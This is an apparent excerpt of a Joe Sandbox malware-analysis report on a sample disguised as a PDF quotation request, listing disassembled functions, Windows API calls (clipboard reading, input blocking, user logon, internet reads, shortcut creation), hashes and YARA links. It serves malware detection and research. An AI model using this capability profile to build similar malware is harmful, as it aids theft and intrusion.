                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                    • String ID:
                                                                    • API String ID: 292994002-0
                                                                    • Opcode ID: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                                                    • Instruction ID: 143e3079ffab126fd184b85051f6534cdea6adf6d01d93e69c1b4810180b6228
                                                                    • Opcode Fuzzy Hash: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                                                    • Instruction Fuzzy Hash: 8F11A2322001119BE3219F2ADC05B9FB798AF80715F15842FF849E7250DBB8E85187A9
                                                                    Function 0047839D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 228comCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                                    • CoInitialize.OLE32(00000000), ref: 00478442
                                                                    • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0047845B
                                                                    • CoUninitialize.OLE32 ref: 0047863C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                    • String ID: .lnk
                                                                    • API String ID: 886957087-24824748
                                                                    • Opcode ID: 9da8986f0495ca00a6a2a6dbfcf51f3daa57ac4e6f9732571e53b5c4becaddd7
                                                                    • Instruction ID: cf4755465b87a828534c2837f83e1451e93ee4f6fe559e45c0b7480b45348b92
                                                                    • Opcode Fuzzy Hash: 9da8986f0495ca00a6a2a6dbfcf51f3daa57ac4e6f9732571e53b5c4becaddd7
                                                                    • Instruction Fuzzy Hash: 17816D70344301AFD210EB54CC82F5AB3E5AFC8B18F10896EF658DB2D1DAB5E945CB96
                                                                    Function 0046DC80 Relevance: 6.1, APIs: 4, Instructions: 70clipboardCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • OpenClipboard.USER32(?), ref: 0046DCE7
                                                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                                    • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                                    • CloseClipboard.USER32 ref: 0046DD0D
                                                                    • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                                    • CloseClipboard.USER32 ref: 0046DD41
                                                                    • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                                    • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                                    • CloseClipboard.USER32 ref: 0046DD99
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                                    • String ID:
                                                                    • API String ID: 15083398-0
                                                                    • Opcode ID: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                                    • Instruction ID: df02eb04a95629b292fb88db9571ebb8a4b5ed240788a0c572d8156b6d3d2bc0
                                                                    • Opcode Fuzzy Hash: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                                    • Instruction Fuzzy Hash: 1A0128326042416BC311BBB99C8596E7B64EF4A324F04097FF984A72C1EB74A912C3A9
                                                                    Function 0044F430 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 458COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _memmove
                                                                    • String ID: U$\
                                                                    • API String ID: 4104443479-100911408
                                                                    • Opcode ID: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                                                    • Instruction ID: 961864e7757f6edfa256f53df2fe8495351bb1c33360f7104140ceff5b52ad59
                                                                    • Opcode Fuzzy Hash: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                                                    • Instruction Fuzzy Hash: 7002A070E002499FEF28CF69C4907AEBBF2AF95304F2481AED45297381D7396D4ACB55
                                                                    Function 0045CAFA Relevance: 4.6, APIs: 3, Instructions: 130fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045CB1F
                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 0045CB7C
                                                                    • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CBAB
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Find$File$CloseFirstNext
                                                                    • String ID:
                                                                    • API String ID: 3541575487-0
                                                                    • Opcode ID: eae3f5a3b7237ff41c3bf9ab8d31e2e7de6a625c8a14a51f6d4c2f6ae7e73f22
                                                                    • Instruction ID: f333144462bda28c064cc07c1e05bb1389ec512a64b809c533c1c3d7cc497df0
                                                                    • Opcode Fuzzy Hash: eae3f5a3b7237ff41c3bf9ab8d31e2e7de6a625c8a14a51f6d4c2f6ae7e73f22
                                                                    • Instruction Fuzzy Hash: 6741DF716003019FC710EF69D881A9BB3E5FF89315F108A6EE9698B351DB75F844CB94
                                                                    Function 004422FE Relevance: 3.1, APIs: 2, Instructions: 89networkfileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0044231E
                                                                    • InternetReadFile.WININET(?,00000000,?,?), ref: 00442356
                                                                      • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Internet$AvailableDataErrorFileLastQueryRead
                                                                    • String ID:
                                                                    • API String ID: 901099227-0
                                                                    • Opcode ID: 88284f1d963be19015867529c9c81aa32f0ba724c82a4bb0319157a833a297e0
                                                                    • Instruction ID: 2cb050104b41b6b223ad4d4b8d529f91c68f3ac810c45c6f1fc1690b5501c343
                                                                    • Opcode Fuzzy Hash: 88284f1d963be19015867529c9c81aa32f0ba724c82a4bb0319157a833a297e0
                                                                    • Instruction Fuzzy Hash: B32174752002047BFB10DE26DC41FAB73A8EB54765F40C42BFE059A141D6B8E5458BA5
                                                                    Function 0047EA6F Relevance: 2.0, APIs: 1, Instructions: 502COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • DefDlgProcW.USER32(?,?,?,?), ref: 0047EA9E
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Proc
                                                                    • String ID:
                                                                    • API String ID: 2346855178-0
                                                                    • Opcode ID: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                                                    • Instruction ID: f892bfb12232205f5f58103f0897237a3558493ed3735c4837d976d353c396a9
                                                                    • Opcode Fuzzy Hash: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                                                    • Instruction Fuzzy Hash: 82B1167330C1182DF218A6AABC81EFF679CD7C5779B10863FF248C55C2D62B5821A1B9
                                                                    Function 0045A370 Relevance: 1.5, APIs: 1, Instructions: 24keyboardCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • BlockInput.USER32(00000001), ref: 0045A38B
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: BlockInput
                                                                    • String ID:
                                                                    • API String ID: 3456056419-0
                                                                    • Opcode ID: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                                                    • Instruction ID: ec784d9e1adcb2c5bdb0852901797f150ca91aa996cd98963819779bf85d9a24
                                                                    • Opcode Fuzzy Hash: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                                                    • Instruction Fuzzy Hash: D8E0DF352002029FC300EF66C84495AB7E8EF94368F10883EFD45D7341EA74E80087A6
                                                                    Function 00436CD7 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 00436CF9
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: LogonUser
                                                                    • String ID:
                                                                    • API String ID: 1244722697-0
                                                                    • Opcode ID: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                                    • Instruction ID: 7208d1371e48addad7a82bf776aec5a394cd9d1c10cc53d221989696c058f8f6
                                                                    • Opcode Fuzzy Hash: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                                    • Instruction Fuzzy Hash: 4DE0ECB626460EAFDB04CF68DC42EBF37ADA749710F004618BA16D7280C670E911CA74
                                                                    Function 00472C3F Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetUserNameW.ADVAPI32(?,?), ref: 00472C51
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: NameUser
                                                                    • String ID:
                                                                    • API String ID: 2645101109-0
                                                                    • Opcode ID: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                                                    • Instruction ID: cbdb53fe1e94bfc77c89611ca4b62432a5518fa0aa6a76fb1323f8d63e00c007
                                                                    • Opcode Fuzzy Hash: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                                                    • Instruction Fuzzy Hash: C3C04CB5004008EBDB148F50D9889D93B78BB04340F108199B60E95040D7B496C9DBA5
                                                                    Function 0041F250 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_0001F20E), ref: 0041F255
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled
                                                                    • String ID:
                                                                    • API String ID: 3192549508-0
                                                                    • Opcode ID: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                                    • Instruction ID: fb0c5f5a3ae0de1c345b26270a1521b23addb5e119a177cdcf8b78f668196b28
                                                                    • Opcode Fuzzy Hash: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                                    • Instruction Fuzzy Hash: 8190027625150157470417705E1964925905B5960275108BA6D11C8564DAA98089A619
                                                                    Function 0042200C Relevance: 1.4, Strings: 1, Instructions: 180COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: N@
                                                                    • API String ID: 0-1509896676
                                                                    • Opcode ID: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                                    • Instruction ID: 433aa61276291b0397d7e0efaabfbd78b7095b9e612e68cb1662ee3b8c9c8781
                                                                    • Opcode Fuzzy Hash: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                                    • Instruction Fuzzy Hash: 48618E71A003259FCB18CF48D584AAEBBF2FF84310F5AC1AED9095B361C7B59955CB88
                                                                    Function 0040FA10 Relevance: .6, Instructions: 607COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                                    • Instruction ID: 421b1f2eadcb2952f8febc08502f38db6b120a980ad90a3a21cdce547adf9c29
                                                                    • Opcode Fuzzy Hash: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                                    • Instruction Fuzzy Hash: 132270B7E5151A9BDB08CE95CC415D9B3A3BBC832471F9129D819E7305EE78BA078BC0
                                                                    Function 004129D0 Relevance: .4, Instructions: 355COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                    • Instruction ID: 2bcfc4213c201322ab01e918109ed7ba488288358e1fe6702c600853dbf8b640
                                                                    • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                    • Instruction Fuzzy Hash: 9CC1B473D0E6B3058B35466D45182BFFE626E91B8031FC392DDD03F399C22AADA196D4
                                                                    Function 004125E8 Relevance: .3, Instructions: 349COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                    • Instruction ID: 7014f9c6c4bb04029b5f83a2624c32223adacf072d8c068e18a9ecb8bc3ae66d
                                                                    • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                    • Instruction Fuzzy Hash: 04C1A473D1A6B2058B36476D05182BFFE626E91B8031FC3D6CCD03F299C22AAD9596D4
                                                                    Function 00412216 Relevance: .3, Instructions: 332COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                    • Instruction ID: 878ae001d8650add2b069b622ec184fb54f95ec25c04ba16196e518284591b6f
                                                                    • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
